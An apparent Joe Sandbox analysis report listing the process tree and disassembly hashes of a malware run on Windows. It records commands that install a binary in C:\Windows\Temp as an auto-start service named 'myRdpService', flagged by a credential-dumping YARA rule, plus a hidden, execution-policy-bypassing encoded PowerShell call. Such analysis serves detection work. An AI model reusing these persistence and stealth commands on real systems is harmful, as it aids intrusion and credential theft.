                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff72e5c0000
                                                                                  File size:875'008 bytes
                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:30
                                                                                  Start time:04:42:13
                                                                                  Start date:08/11/2024
                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"cmd.exe" /c sc query myRdpService
                                                                                  Imagebase:0x7ff7d4800000
                                                                                  File size:289'792 bytes
                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:31
                                                                                  Start time:04:42:13
                                                                                  Start date:08/11/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff72e5c0000
                                                                                  File size:875'008 bytes
                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:32
                                                                                  Start time:04:42:13
                                                                                  Start date:08/11/2024
                                                                                  Path:C:\Windows\System32\sc.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:sc query myRdpService
                                                                                  Imagebase:0x7ff686030000
                                                                                  File size:72'192 bytes
                                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:33
                                                                                  Start time:04:42:13
                                                                                  Start date:08/11/2024
                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"cmd.exe" /c sc stop "myRdpService"
                                                                                  Imagebase:0x7ff7d4800000
                                                                                  File size:289'792 bytes
                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:34
                                                                                  Start time:04:42:14
                                                                                  Start date:08/11/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff72e5c0000
                                                                                  File size:875'008 bytes
                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:35
                                                                                  Start time:04:42:14
                                                                                  Start date:08/11/2024
                                                                                  Path:C:\Windows\System32\sc.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:sc stop "myRdpService"
                                                                                  Imagebase:0x7ff686030000
                                                                                  File size:72'192 bytes
                                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:36
                                                                                  Start time:04:42:15
                                                                                  Start date:08/11/2024
                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"cmd.exe" /c sc query myRdpService
                                                                                  Imagebase:0x7ff7d4800000
                                                                                  File size:289'792 bytes
                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:37
                                                                                  Start time:04:42:15
                                                                                  Start date:08/11/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff72e5c0000
                                                                                  File size:875'008 bytes
                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:38
                                                                                  Start time:04:42:15
                                                                                  Start date:08/11/2024
                                                                                  Path:C:\Windows\System32\sc.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:sc query myRdpService
                                                                                  Imagebase:0x7ff686030000
                                                                                  File size:72'192 bytes
                                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:39
                                                                                  Start time:04:42:22
                                                                                  Start date:08/11/2024
                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"cmd.exe" /c sc delete "myRdpService" & SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto & net start "myRdpService"
                                                                                  Imagebase:0x7ff7d4800000
                                                                                  File size:289'792 bytes
                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:40
                                                                                  Start time:04:42:22
                                                                                  Start date:08/11/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff72e5c0000
                                                                                  File size:875'008 bytes
                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:41
                                                                                  Start time:04:42:22
                                                                                  Start date:08/11/2024
                                                                                  Path:C:\Windows\System32\sc.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:sc delete "myRdpService"
                                                                                  Imagebase:0x7ff686030000
                                                                                  File size:72'192 bytes
                                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:42
                                                                                  Start time:04:42:22
                                                                                  Start date:08/11/2024
                                                                                  Path:C:\Windows\System32\sc.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:SC CREATE "myRdpService" binpath= "C:\Windows\Temp\myRdpService.exe cakoi10" start= auto
                                                                                  Imagebase:0x7ff686030000
                                                                                  File size:72'192 bytes
                                                                                  MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:43
                                                                                  Start time:04:42:22
                                                                                  Start date:08/11/2024
                                                                                  Path:C:\Windows\System32\net.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:net start "myRdpService"
                                                                                  Imagebase:0x7ff77faa0000
                                                                                  File size:59'904 bytes
                                                                                  MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:44
                                                                                  Start time:04:42:22
                                                                                  Start date:08/11/2024
                                                                                  Path:C:\Windows\System32\net1.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\net1 start "myRdpService"
                                                                                  Imagebase:0x7ff699b80000
                                                                                  File size:183'808 bytes
                                                                                  MD5 hash:BA0BCCC6029FBBE6D8B41197F252742F
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:45
                                                                                  Start time:04:42:22
                                                                                  Start date:08/11/2024
                                                                                  Path:C:\Windows\Temp\myRdpService.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\Temp\myRdpService.exe cakoi10
                                                                                  Imagebase:0x7ff7a5c10000
                                                                                  File size:9'427'456 bytes
                                                                                  MD5 hash:F651568CD1F1A7ABAEDD4389DA3A2F14
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Yara matches:
                                                                                  • Rule: hacktool_windows_moyix_creddump, Description: creddump is a python tool to extract credentials and secrets from Windows registry hives., Source: 0000002D.00000002.3845244582.00007FF7A6116000.00000004.00000001.01000000.0000000A.sdmp, Author: @mimeframe
                                                                                  Has exited:false

                                                                                  General

                                                                                  Target ID:46
                                                                                  Start time:04:42:35
                                                                                  Start date:08/11/2024
                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:"powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZwBlAHQALQBzAGUAcgB2AGkAYwBlACAAIgBtAHkAUgBkAHAAUwBlAHIAdgBpAGMAZQAiAA==
                                                                                  Imagebase:0x7ff6d7f80000
                                                                                  File size:452'608 bytes
                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:true

                                                                                  General

                                                                                  Target ID:47
                                                                                  Start time:04:42:35
                                                                                  Start date:08/11/2024
                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                  Wow64 process (32bit):false
                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                  Imagebase:0x7ff72e5c0000
                                                                                  File size:875'008 bytes
                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                  Has elevated privileges:true
                                                                                  Has administrator privileges:true
                                                                                  Programmed in:C, C++ or other language
                                                                                  Has exited:false

                                                                                  Disassembly

                                                                                  Reset < >

                                                                                    Executed Functions

                                                                                    Function 00007FFC44C6F1C6 Relevance: .5, Instructions: 473COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.2812676241.00007FFC44C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC44C60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_7ffc44c60000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1876fbe6195d0bd420cde71d737ff099e03924cca1e2d13168ae7e187c4f25d6
                                                                                    • Instruction ID: 5e9848003aeb9ae4fc8b8bb56d7fbc950108d9680d6bdf3c31624e6705c85076
                                                                                    • Opcode Fuzzy Hash: 1876fbe6195d0bd420cde71d737ff099e03924cca1e2d13168ae7e187c4f25d6
                                                                                    • Instruction Fuzzy Hash: 10F1943090CA8D8FEBA8EF28C8557E977D2FF54310F14826AE84DC7295DB34A945CB91
                                                                                    Function 00007FFC44C6FF72 Relevance: .5, Instructions: 459COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.2812676241.00007FFC44C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC44C60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_7ffc44c60000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d8a64c30deddb9cd9f179af5d55387b3e6cf8d78cdef2961f33c56719c677ee7
                                                                                    • Instruction ID: bdb9e193abd395d0a6412bb28a94e9d7212f341adcb029c2802db26df19b4185
                                                                                    • Opcode Fuzzy Hash: d8a64c30deddb9cd9f179af5d55387b3e6cf8d78cdef2961f33c56719c677ee7
                                                                                    • Instruction Fuzzy Hash: 31E1B23090CA4E8FEBA8EF28C8957E977D2FB54310F14426EE84DC7295DB74A945CB81
                                                                                    Function 00007FFC453D0331 Relevance: .4, Instructions: 413COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.2825385373.00007FFC453D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC453D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_7ffc453d0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 748b36e15166e8c9dc47735fb0bd28bf1f2e75abdc622498e98c29853eb0a208
                                                                                    • Instruction ID: 31f6c12255b5deb943a05300fb5f06e495f1a3c76f7197b5eecfc21058da3822
                                                                                    • Opcode Fuzzy Hash: 748b36e15166e8c9dc47735fb0bd28bf1f2e75abdc622498e98c29853eb0a208
                                                                                    • Instruction Fuzzy Hash: 86C15A2691E6DE4FE756A32858655B47FF2EF82A10F0808FED449C70D3E908AC09C762
                                                                                    Function 00007FFC44C6B325 Relevance: .4, Instructions: 402COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.2812676241.00007FFC44C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC44C60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_7ffc44c60000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 58e428a0235030154b62ef651588a1b0fc6a47d4d04ef5dc4684feba1b56d70c
                                                                                    • Instruction ID: 7a573505d400ea30e95b7d01d3437033762e87d12ac01d45c27f2c2034a9d834
                                                                                    • Opcode Fuzzy Hash: 58e428a0235030154b62ef651588a1b0fc6a47d4d04ef5dc4684feba1b56d70c
                                                                                    • Instruction Fuzzy Hash: D531C47190DB988FDB16DB6898956F97FF0EF52310F1841AFC089C71A3D624680ACB52
                                                                                    Function 00007FFC44C6FB86 Relevance: .3, Instructions: 332COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.2812676241.00007FFC44C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC44C60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_7ffc44c60000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 35e35ed36eab76308c9f04f4cf494a088d8312b24851b0c29e70cf78fab23c87
                                                                                    • Instruction ID: 472502cb41aad9da038f8f9a64eb5ef8b2aa848f636a9ecdcc46f5024580f46e
                                                                                    • Opcode Fuzzy Hash: 35e35ed36eab76308c9f04f4cf494a088d8312b24851b0c29e70cf78fab23c87
                                                                                    • Instruction Fuzzy Hash: 37B1C53050CA4D4FEB69EF28C8957E93BE1FF55310F14826EE84DC7296CA34A945CB92
                                                                                    Function 00007FFC44D327E8 Relevance: .1, Instructions: 118COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.2813596332.00007FFC44D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC44D30000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_7ffc44d30000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 39a1a1dbfbfc70e02da13b21d5fad99520a4d9bdb03b6ff26d3e5e4d1c011991
                                                                                    • Instruction ID: be8e999657e121265ade636c530b6cfb5a7fee77deb96ab7ea0c3b56259ca7b9
                                                                                    • Opcode Fuzzy Hash: 39a1a1dbfbfc70e02da13b21d5fad99520a4d9bdb03b6ff26d3e5e4d1c011991
                                                                                    • Instruction Fuzzy Hash: 7B31B822F0DE2D4FEBA9EA1C94516B9B3D3EF54220B5405BBC94EC319ADD14AC00C395
                                                                                    Function 00007FFC44C72C8D Relevance: .1, Instructions: 118COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.2812676241.00007FFC44C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC44C60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_7ffc44c60000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 035a794efe891bd1670c2feb65d2b67bca1cfc18627f5ba44d67459590d606bd
                                                                                    • Instruction ID: 218a5793c632785e677f15f7e6d926cf60fd0fad65115173e846ba5f86ed45d5
                                                                                    • Opcode Fuzzy Hash: 035a794efe891bd1670c2feb65d2b67bca1cfc18627f5ba44d67459590d606bd
                                                                                    • Instruction Fuzzy Hash: B931B23091CB4C9FDB18DB4C98466A9BBE0FBA9321F00422FE459D3251DB70A855CBC2
                                                                                    Function 00007FFC44C6B658 Relevance: .1, Instructions: 104COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.2812676241.00007FFC44C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC44C60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_7ffc44c60000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 556cd7fb5ae649b98163ef89aeb8c3fa44f9901de11dbec4d424c63cf8c0db58
                                                                                    • Instruction ID: 48f6237830f6d5f2aac5ef2a6a26cdd9cd7120df63d469080ff16b7cc021185c
                                                                                    • Opcode Fuzzy Hash: 556cd7fb5ae649b98163ef89aeb8c3fa44f9901de11dbec4d424c63cf8c0db58
                                                                                    • Instruction Fuzzy Hash: 3D31483090C65C8FEB58EF98C88A7F97BE0EB66320F04416FD449C3192DA70A806CB52
                                                                                    Function 00007FFC44C73018 Relevance: .1, Instructions: 102COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.2812676241.00007FFC44C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC44C60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_7ffc44c60000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 91e869f964d77ab9774afed80c1c39b400bc657fffb6cf9b9d5b086533161192
                                                                                    • Instruction ID: fb5a6d629964197aab77acda52c3535679ea20eb20a7c32699ad5216e3ed8858
                                                                                    • Opcode Fuzzy Hash: 91e869f964d77ab9774afed80c1c39b400bc657fffb6cf9b9d5b086533161192
                                                                                    • Instruction Fuzzy Hash: 9821263190CB4C8FDB59DFAC884A7E97BE0EB96320F04426FD448C3156DA74A416CBA1
                                                                                    Function 00007FFC44C6F684 Relevance: .1, Instructions: 92COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.2812676241.00007FFC44C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC44C60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_7ffc44c60000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 6e826e11627765d0a63329632a3c1591945555b140c5d863df4ad39e6fb2ec14
                                                                                    • Instruction ID: 368069d616bfaadbd0c842b3c60bf6ddec215b739d0d42c9d55aa828c5da9328
                                                                                    • Opcode Fuzzy Hash: 6e826e11627765d0a63329632a3c1591945555b140c5d863df4ad39e6fb2ec14
                                                                                    • Instruction Fuzzy Hash: B4311E3091D5AD8EFBB4EF14CC5ABF932D2FF45319F54413AD80DC6096CA786985CA21
                                                                                    Function 00007FFC453D0620 Relevance: .1, Instructions: 69COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.2825385373.00007FFC453D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC453D0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_7ffc453d0000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 51f7a1c1f7fcb0d9b7ce62edb3193a2892ae9bcad44ff2bc82c990d48723298c
                                                                                    • Instruction ID: fd6558b909cf4903e43cd008ef99d628e7794aa286ac20e9f92ddf69a2e135d1
                                                                                    • Opcode Fuzzy Hash: 51f7a1c1f7fcb0d9b7ce62edb3193a2892ae9bcad44ff2bc82c990d48723298c
                                                                                    • Instruction Fuzzy Hash: 0A11819680E7DA0FE767A7642C662A47FB1DF53A54F0A04FAC085CA5E3E80D5C49C362
                                                                                    Function 00007FFC44D32818 Relevance: .1, Instructions: 51COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.2813596332.00007FFC44D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC44D30000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_7ffc44d30000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: ae08c57be5ae73d55f2992b2eda550da75fcc192d6611c52b5285141fe931952
                                                                                    • Instruction ID: c1812330e330ab5edb7773b823c55c08041006657a3539ab37c51619d758ada2
                                                                                    • Opcode Fuzzy Hash: ae08c57be5ae73d55f2992b2eda550da75fcc192d6611c52b5285141fe931952
                                                                                    • Instruction Fuzzy Hash: 4501FE12F1DE3F0BFAEDA71C54951B8D1D3DF542107A4017AD94EC319ADD08AC049251
                                                                                    Function 00007FFC44C637B5 Relevance: .0, Instructions: 49COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.2812676241.00007FFC44C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC44C60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_7ffc44c60000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bb41c5088c83ff3ff9212e5f6e9c405d94860b8db11be397b3e57a14267cfe5e
                                                                                    • Instruction ID: 1487826caffefd82b366c1f1a58caa5db06589babe303c2c4f49a3166a82fd52
                                                                                    • Opcode Fuzzy Hash: bb41c5088c83ff3ff9212e5f6e9c405d94860b8db11be397b3e57a14267cfe5e
                                                                                    • Instruction Fuzzy Hash: 3801677111CB0D4FD744EF0CE491AA6B7E0FB95324F10056EE58AC3665DA36E892CB45
                                                                                    Function 00007FFC44C72E58 Relevance: .0, Instructions: 41COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.2812676241.00007FFC44C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC44C60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_7ffc44c60000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5860ae504cb726c26e365fc393380833a66f8409176452725afa14a62a283ca4
                                                                                    • Instruction ID: 74124bc2d2388450483aa460d352221d99d27a47fb4096bb741db36f694cfa76
                                                                                    • Opcode Fuzzy Hash: 5860ae504cb726c26e365fc393380833a66f8409176452725afa14a62a283ca4
                                                                                    • Instruction Fuzzy Hash: B5F02B30C0868D4FDB05DF2488465D57FA0EF26211B050297D848C7161DB749458CBD2
                                                                                    Function 00007FFC44C7588D Relevance: .0, Instructions: 17COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.2812676241.00007FFC44C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC44C60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_7ffc44c60000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 5f662dbe4b2448f42701def6d62c5a74b530d72585888b69915970e619b21e0d
                                                                                    • Instruction ID: 92bf0af8dc5d85d42c17a56f44b8147788bca9f427de8acb9adc3c6d5122f24b
                                                                                    • Opcode Fuzzy Hash: 5f662dbe4b2448f42701def6d62c5a74b530d72585888b69915970e619b21e0d
                                                                                    • Instruction Fuzzy Hash: 05C01233E1C52A4A6608B148B8430FC6391EB81130A288037D64AC1806AB16202785DA

                                                                                    Non-executed Functions

                                                                                    Function 00007FFC44C64C39 Relevance: 26.7, Strings: 21, Instructions: 429COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.2812676241.00007FFC44C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC44C60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_7ffc44c60000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: (]D$(^D$(_D$8]D$8^D$8_D$H]D$H^D$H_D$X]D$X^D$X_D$h]D$h^D$h_D$x]D$x^D$x_D$\D$]D$^D
                                                                                    • API String ID: 0-2122451072
                                                                                    • Opcode ID: a4908a18ee86862c049c4318534bd222a328c9b6f0673bed9c4c45f1db4d0748
                                                                                    • Instruction ID: 9336351fa10d47027869eb05f427bd6992f576f603ba5ee52d6605147579c571
                                                                                    • Opcode Fuzzy Hash: a4908a18ee86862c049c4318534bd222a328c9b6f0673bed9c4c45f1db4d0748
                                                                                    • Instruction Fuzzy Hash: 9CC1EA83B0E9D39BF955D39CAC5713D6B92EB8122472D81FBC448AB1CF4824DD0A839D
                                                                                    Function 00007FFC44C65B8F Relevance: 6.3, Strings: 5, Instructions: 52COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.2812676241.00007FFC44C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC44C60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_7ffc44c60000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 8kD$HkD$XkD$hkD$xkD
                                                                                    • API String ID: 0-3895287406
                                                                                    • Opcode ID: b8278c7cc43ff2d9c2216838e9f745f3f47935bf071a0c2fee60ad150678d0aa
                                                                                    • Instruction ID: 48016a01d8eaa55e0a1edd06b507450d127d8ab268052d30365a370a46d14d05
                                                                                    • Opcode Fuzzy Hash: b8278c7cc43ff2d9c2216838e9f745f3f47935bf071a0c2fee60ad150678d0aa
                                                                                    • Instruction Fuzzy Hash: C901D682A0E8EBCFF625E1587C4513C0A96EBF2320B3C81F7C54C5B4CF58249809C7A6
                                                                                    Function 00007FFC44C65D92 Relevance: 5.0, Strings: 4, Instructions: 46COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.2812676241.00007FFC44C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFC44C60000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_7ffc44c60000_powershell.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: HmD$XmD$hmD$xmD
                                                                                    • API String ID: 0-2088348024
                                                                                    • Opcode ID: 420e2ba0cf518bf93d47838cf594eaaf5a77e8df8f4f649612a963627ffaa41b
                                                                                    • Instruction ID: 070b09749b2ffd6812989d14b15ad7c2490ffcea774cab7a632777eb42be39b9
                                                                                    • Opcode Fuzzy Hash: 420e2ba0cf518bf93d47838cf594eaaf5a77e8df8f4f649612a963627ffaa41b
                                                                                    • Instruction Fuzzy Hash: 2401F7C6A0E8D78FFA26E268681A17D5A92EF62254B3C41F7C4882B0DF54159C05C3A5
                                                                                    Function 00007FFC44C65CA0 Relevance: 5.0, Strings: 4, Instructions: 35COMMON
                                                                                    Download Yara Rule
